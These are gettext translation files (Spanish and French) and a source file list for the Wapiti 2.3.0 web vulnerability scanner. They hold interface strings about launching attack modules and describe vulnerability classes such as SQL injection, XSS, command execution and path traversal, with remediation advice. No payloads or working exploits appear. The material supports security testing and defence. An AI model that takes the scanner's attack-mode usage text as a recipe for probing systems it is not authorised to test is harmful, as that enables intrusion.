"Connection refused!" msgstr "Conexión rechazada!" 
#: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Excepción en lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Archivo {0} cargado, el escaneo continua:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs a escanear" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URL escaneadas" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Fichero {0} no encontrado, Wapiti escaneará el website de nuevo" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Aviso" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Este escaneo se ha guardado en el archivo {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Puedes usarlo para realizar ataques sin escanear de nuevo el website mediante el parámetro \"-k\"" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Escaneo detenido, la información se ha salvado en el archivo {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Para continuar con este escaneo, debes lanzar Wapiti con el parámetro \"-i\"" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Información de los formularios" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "De: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "A: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Subida de scripts" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formularios" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formulario {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Método: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Inputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Selects:" #: 
../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLs" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Informe para {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Fecha del escaneo: {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Ámbito del escaneo: {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Resumen de vulnerabilidades" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Petición maliciosa:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL command PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalias encontradas" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Proceso de ataque interrumpido. Para realizar el ataque de nuevo lance Wapiti con los parámetros \"-i\" o \"-k\"." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Archivo {0} no encontrado. Wapiti escaneará el website de nuevo" msgid "[!] Unable to find a module named {0}" msgstr "[!] Imposible encontrar el módulo llamado {0}" msgid "Backup file description" msgstr "" "Es posible que se encuentren archivos de backup de los comandos " "ejecutados en el servidor que el administrador dejó para guardar una " "versión anterior o archivos de copia de seguridad que se generan " "automáticamente por editores de texto (como por ejemplo, Emacs). " "Estas copias pueden revelar código fuente o contraseñas." 
msgid "Backup file solution" msgstr "" "El administrador necesita borrar la copia de seguridad o moverla fuera de los " "directorios de la aplicación web. También debe desactivar las copias de seguridad " "automáticas en la configuración del editor de texto." msgid "Blind SQL Injection description" msgstr "" "La inyección SQL a ciegas es una técnica que se aprovecha de una vulnerabilidad " "en la base de datos de la aplicación. Este tipo de vulnerabilidad es más " "difícil de detectar que una inyección SQL clásica ya que no muestra ningún " "mensaje en la web." msgid "Blind SQL Injection solution" msgstr "" "Para proteger una aplicación de una inyección SQL, el usuario no debe utilizar " "consultas SQL directamente en el código. Los parámetros suministrados por el " "usuario deben ser escapados y filtrados. Las consultas deben estar parametrizadas." msgid "Commands execution description" msgstr "" "Este ataque consiste en ejecutar comandos del sistema en el servidor. El " "atacante trata de inyectar comandos en los parámetros de la petición." msgid "Commands execution solution" msgstr "" "Se debe evitar utilizar parámetros suministrados por el usuario en las " "llamadas al sistema de ficheros." msgid "CRLF description" msgstr "" "El término CRLF se refiere a 'Carriage Return (ASCII 13, \\r) Line Feed " "(ASCII 10, \\n)' (en inglés). Esos caracteres se utilizan para indicar el " "final de una línea, sin embargo no todos los sistemas operativos los interpretan " "de la misma forma. Por ejemplo, en Windows, ambos, CR y LF son necesarios para " "marcar el final de la línea, mientras que en Linux/UNIX sólo LF es necesario. La " "combinación de CR y LF es usada por ejemplo cuando se presiona 'Enter'. " "Dependiendo de la aplicación, presionar 'Enter' crea una nueva línea o " "ejecuta un comando." msgid "CRLF solution" msgstr "" "Comprobar los parámetros suministrados por el usuario y filtrar CR y LF." 
msgid "Cross Site Scripting description" msgstr "" "Cross-site scripting (XSS) es un tipo de vulnerabilidad que normalmente se " "encuentra en aplicaciones web que permiten la inyección de código malicioso " "en páginas que son vistas por otros usuarios. Un ejemplo es la inyección de " "código HTML y javascript." msgid "Cross Site Scripting solution" msgstr "" "La mejor forma de proteger una aplicación web de ataques XXS es asegurarse " "de que la aplicación valida todas las cabeceras, las cookies y todos los " "campos de los formularios (visibles y ocultos) que son enviados al servidor. " "También se debe validar toda la información que se manda al usuario desde el servidor " "para evitar que scripts inyectados puedan ejecutarse en los navegadores de otros usuarios. " "Una buena forma de proteger aplicaciones web de este tipo de ataques es convertir " "los siguientes caracteres en su equivalente en HTML: <, >, &, ", " "', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "Este ataque también se conoce como 'Path Transversal' o 'Directory Transversal'. " "Su objetivo es acceder a ficheros y directorios que se encuentran fuera del " "directorio de la aplicación web. El atacante es capaz de acceder a los directorios " "del servidor utilizando distintas técnicas como por ejemplo la manipulación de " "variables que referencian a ficheros con secuencias de '../' para moverse por los " "directorios del servidor." msgid "File Handling solution" msgstr "" "Evite trabajar con información suministrada por el usuario cuando haga llamadas " "al sistema de ficheros. Use índices en vez de nombres o partes del nombre de los " "ficheros. Por ejemplo, utilice idioma=5 para acceder a la página en sueco en " "vez de utilizar idioma=sueco. Valide todos los parámetros suministrados por el " "usuario chequeando una lista de valores posibles. Utilice 'chrooted jails' y " "restrinja el acceso de los ficheros adecuadamente." 
msgid "Htaccess bypass description" msgstr "" "Los ficheros htaccess se usan para restringir el acceso de algunos ficheros o " "métodos HTTP. En algunos casos, es posible saltarse esta protección y acceder " "a los ficheros." msgid "Htaccess bypass solution" msgstr "Asegúrese de que todas las llamadas HTTP se prohiben en el caso en el que las credenciales sean incorrectas." msgid "Internal server error description" msgstr "Un error en el servidor que evita que se procese la petición puede ser una señal de que existe una vulnerabilidad." msgid "Internal server error solution" msgstr "Investigue los logs del servidor en busca de información más detallada sobre el error." msgid "Potentially dangerous file description" msgstr "Un fichero con vulnerabilidades se ha encontrado en el sitio web." msgid "Potentially dangerous file solution" msgstr "Asegúrese de que el script se encuentra actualizado y de que sus permisos son lo más restrictivos posible." msgid "Resource consumption description" msgstr "Al servidor le llevó más tiempo de lo normal el responder a una consulta. Un atacante puede utilizar esta debilidad como un arma para sobrecargar al sistema." msgid "Resource consumption solution" msgstr "El script en cuestión puede que esté utilizando los recursos (CPU, memoria, acceso de ficheros, base de datos…) de una manera ineficiente." msgid "SQL Injection description" msgstr "" "Las vulnerabilidades SQL permiten al atacante alterar las queries que son ejecutadas en la base de datos." "El atacante puede extraer o modificar la información de la base de datos o incluso obtener más privilegios en el sistema." msgid "SQL Injection solution" msgstr "" "Para protegerse de inyecciones SQL, los parámetros de usuario no se deben " "utilizar directamente para la crear la sentencia SQL. Esos parámetros se deben " "escapar o filtrar. Las consultas deben estar parametrizadas." 
wapiti-2.3.0+dfsg/wapitiCore/language_sources/file_list.txt
../attack/attack.py
../attack/mod_backup.py
../attack/mod_blindsql.py
../attack/mod_crlf.py
../attack/mod_exec.py
../attack/mod_file.py
../attack/mod_htaccess.py
../attack/mod_nikto.py
../attack/mod_permanentxss.py
../attack/mod_sql.py
../attack/mod_xss.py
../net/getcookie.py
../net/cookie.py
../net/lswww.py
../report/txtreportgenerator.py
../vulnerability.py
../wapiti.py
wapiti-2.3.0+dfsg/wapitiCore/language_sources/fr.po
# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Evil url: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} dans {1} via une injection dans le paramètre {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " en provanance de {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} dans {1} via une injection dans la query string" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} dans {1} via une injection dans le chemin de la ressource" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Paramètre en cause : {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Evil request:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "Injection SQL" #: ../vulnerability.py:68 msgid "Blind SQL
Injection" msgstr "Injection SQL en aveugle" #: ../vulnerability.py:69 msgid "File Handling" msgstr "Divulgation de fichier" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Exécution de commandes" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Contournement de htaccess" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Copie de sauvegarde" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Fichier potentiellement dangereux" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Erreur interne au serveur" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Consommation anormale de ressource" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Une erreur HTTP 500 a été obtenue avec {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Un délais d'attente dépassé a eu lieu avec {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans la query string" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le chemin de la ressource" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le paramètre {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans la query string" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting 
to inject a payload in the resource path" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le chemin de la ressource" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Argument invalide pour l'option {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Chargement des modules :" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "Aucun lien ni formulaire trouvé dans cette page !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Assurez-vous que l'URL est correcte." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Dépendances manquantes pour le module {0} :" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Lancement du module {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Scripts d'upload trouvés :" #: ../wapiti.py:335 msgid "Report" msgstr "Rapport" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Un rapport a été généré dans le fichier {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Ouvrez {0}/index.html dans un navigateur pour voir ce rapport." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Un scanneur de vulnérabilités pour applications web \n" " \n" " Mode d'emploi : python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Les options possibles sont les suivantes : \n" " -s \n" " --start \n" " \tCommencer le scan par l'url spécifiée. 
Cette option peut être appelée plusieurs fois.\n" " \tWapiti va explorer ces liens afin de trouver de nouvelles URLs même si c'est liens sont hors du périmètre de scan.\n" " \n" " -x \n" " --exclude \n" " \tPour exclure une url du scan (par exemple un script de déconnexion). Cette option peut être appelée plusieurs fois.\n" " \tL'usage de l'astérisque (*) est possible comme expression régulière basique.\n" " \tExemple : -x http://server/base/?page=*&module=test \n" " \tou -x http://server/base/admin/* pour exclure un répertoire \n" " \n" " -p \n" " --proxy \n" " \tSpécifier l'utilisation d'un proxy. Les types de proxies actuellement supportés sont HTTP et HTTPs.\n" " \tCette option peut être appelée deux fois afin d'indiquer le proxy HTTP ainsi que celui pour le HTTPS.\n" " \tExemple: -p http://proxy:port/ \n" " \n" " -c \n" " --cookie \n" " \tImporter des cookies à utiliser pour le scan. Le fichier conteneur de cookies doit être au format JSON.\n" " \tLes cookies peut être récupérés via l'utilisation des outils cookie.py et getcookie.py présents dans le dossier \"net\".\n" " \n" " -t \n" " --timeout \n" " \tDéfinir le temps d'attente (en secondes) d'une réponse du serveur pour une requête.\n" " \n" " -a \n" " --auth \n" " \tSpécifier des identifiants pour l'authentification HTTP \n" " \n" " --auth-method \n" " \tSi le serveur réclame une authentification, permet de spéficier la méthode d'authentification à utiliser.\n" " \tLes méthodes actuellement supportées sont (certaines nécessitent l'installation de module supplémentaires) :\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tRetirer un paramêtre (nom et valeur) de toutes les URLs.\n" " \n" " -n \n" " --nice \n" " \tDéfinir une limite pour le nombre d'URLs à traiter qui sont basées sur la même " "construction (càd, le nombre maximum de valeurs uniques pour un même paramètre). 
\n" " \tUtilisez cette option pour éviter d'entrer dans des boucles infinies lors du scan. \n" " \tCette valeur doit être supérieur à 0.\n" " \n" " -m \n" " --module \n" " \tDéfinir les modules et les méthodes HTTP associées à utiliser pour les " "attaques.\n" " \tPrécédez le nom d'un module par un tiret pour le désactiver.\n" " \tPour explorer la cible sans lancer la moindre attaque, désactivez tous les modules avec -m \"-all\".\n" " \tEn l'absence de méthodes HTTP spécifiées pour un module, GET et POST seront utilisés.\n" " \tExemple: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUtiliser les couleurs du terminal pour mettre en valeur les vulnérabilités et anomalies.\n" " \n" " -v \n" " --verbose \n" " \tDéfinie le niveau de verbosité des résultats.\n" " \t0: silencieux (défaut), 1: affiche chaque url, 2: affiche chaque attaque.\n" " \n" " -b \n" " --scope \n" " \tDéfinir le périmètre du scan :\n" " \t\t+ page : analyser uniquement la page donnée en argument principal.\n" " \t\t+ folder : analyser toutes les pages trouvées sous l'arborescence passée comme URL (par défaut).\n" " \t\t+ domain : analyser toutes les pages trouvées pour le domaine correspondant à celui spécifié dans l'URL passée à Wapiti.\n" " \n" " -f \n" " --format \n" " \tDéfinir le format du rapport. \n" " \tjson: Rapport au format JSON \n" " \thtml: Rapport au format HTML (choix par défaut)\n" " \topenvas: Rapport au format XML OpenVAS \n" " \ttxt: Rapport au format texte simple (UTF-8) \n" " \tvulneranet: Rapport au format XML VulneraNET \n" " \txml: Rapport au format XML \n" " \n" " -o \n" " --output \n" " \tSpéficier l'emplacement du disque où enregistrer le rapport. \n" " \tSi le rapport est au format html, ce paramètre sera utilisé comme nom de répertoire. 
\n" " \n" " -i \n" " --continue \n" " \tReprendre une session de scan en chargeant le status sauvegardé dans le fichier XML spécifié.\n" " \tSi le paramètre est appelé sans argument, Wapiti charge la session depuis un fichier par défaut présent dans le dossier \"scans\".\n" " \n" " -k \n" " --attack \n" " \tLancer directement les attaques en chargeant les URLs présentes dans le fichier XML de status spécifié (sans relancer l'exploration des pages du site).\n" " \tSi le fichier n'est pas spécifié, Wapiti charge un fichier par défaut présent dans le dossier \"scans\".\n" " \n" " --verify-ssl <0|1>\n" " \tIndique à Wapiti s'il doit ou non vérifier les certificats SSL.\n" " \tLe comportement par défaut est de vérifieir les certificats.\n" " \n" " -h \n" " --help \n" " \tAfficher ce message d'aide\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Fichier {0} chargé. Wapiti va s'en servir pour effectuer l'attaque" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "erreur : {0} lors de l'attaque de {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "erreur: délais d'attente dépassé lors de l'attaque de {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} en provenance de {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Copie de sauvegarde trouvée !" 
#: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Copie de sauvegarde {0} trouvée pour {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Faille d'injection SQL en aveugle" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} via une injection dans la query string" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} via une injection dans le paramètre {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "Injection CRLF" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Erreur : Le serveur n'a pas compris la requête" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Exécution de commande" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "Interprétation de code PHP" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Avertissement exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "Injection via preg_replace" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Avertissement usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Avertissement assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Avertissement d'une évaluation" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Faille d'inclusion distante" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Divulgation de fichiers sur un système Linux" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" 
msgstr "Divulgation de fichiers sur un système BSD" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Divulgation de fichiers sur un système Window" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Divulgation de fichier présent dans le include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "Divulgation de fichier présent dans basedur vie highlight_file()" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "Inclusion d'un fichier présent dans le include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Eventuelle faille de type {0}" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "Protection par htaccess trouvée : {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "| Code HTTP : {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Code source :" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr "Disfonctionnement dans la protection .htaccess : {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "| Code HTTP : {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Un problème est survenu avec la base de données nikto locale" #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Téléchargement depuis le web..." 
#: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Erreur de téléchargement de la base Nikto" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Références" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Faille XSS permanent" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Un XSS permanent a été trouvé dans {0} avec {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Un XSS permanent a été trouvé en envoyant les champs {1} depuis {0}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "Injection MySQL" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Injection SQL sur système MS-Access" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "Injection MSSQL" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Injection SQL Java" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "Injection PostgreSQL" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "Injection XPath" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "Injection LDAP" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "Injection SQL DB2" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Injection SQL Interbase" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Injection SQL Sybase" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr "Injection SQL .NET" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Injection SQL Oracle" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "Faille XSS" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource 
path" msgstr "Faille XSS trouvée via l'injection dans le chemin de la ressource" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "Faille XSS trouvée via l'injection dans la query string" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "Faille XSS trouvée via l'injection dans le paramètre {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "Aucun formulaire n'a été trouvé dans cette page !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Sélectionnez le formulaire que vous souhaitez utiliser :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Entrez un numéro : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Veuillez renseignr les champs pour le formulaire suivant : " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Impossible d'atteindre l'URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "Le premier argument doit être l'URL racine !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Protocole invalide : {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Cet argument n'est pas un lien valide : {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Connexion refusée !" 
#: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Exception reçue dans lswww.browse : {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Fichier {0} chargé, le scan continue :" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs à explorer" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs explorées" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Le Fichier {0} n'a pas été trouvé, Wapiti va recommencer le scan du site" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Note" msgstr " Note" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Le scan a été sauvegardé dans le fichier {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Vous pouvez l'utiliser pour lancer de futures attaques sans avoir à relancer le scan via le paramètre \"-k\"" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been saved in the file {0}/{1}.xml" msgstr "Scan interrompu, les données ont été sauvegardées dans le fichier {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Pour reprendre ce scan, vous pouvez lancer wapiti avec l'option \"-i\"" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Formulaires" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "Depuis: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "Vers: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Scripts d'upload" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formulaires" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formulaire {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Méthode : {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Intputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * 
Selects:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Rapport pour {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Date du scan : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Portée de ce scan : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Résumé des vulnérabilités :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Evil request:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "PoC en commande cURL : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalies rencontrées :" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Le processus d'attaque a été interrompu. Pour relancer l'attaque, lancez Wapiti avec les options \"-i\" ou \"-k\"" #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Le fichier {0} n'a pas été trouvé. Wapiti va scanner le site à nouveau" msgid "[!] Unable to find a module named {0}" msgstr "[!] Impossible de trouver le module {0}" msgid "Backup file description" msgstr "" "Il se peut que des copies de sauvegarde de scripts soient accessibles sur le " "serveur. L'administrateur web a du placer volontairement une sauvegarde dans " "l'idée de revenir à une précédente version ou involontairement en utilisant " "un éditeur configuré pour sauver automatiquement une copie après une " "certaine durée.Ces fichiers peuvent révéler des informations intéressantes " "comme du code source ou encore des identifiants (accès à la base de données)." 

msgid "Backup file solution"
msgstr ""
"L'administrateur web doit supprimer manuellement les sauvegardes présentes "
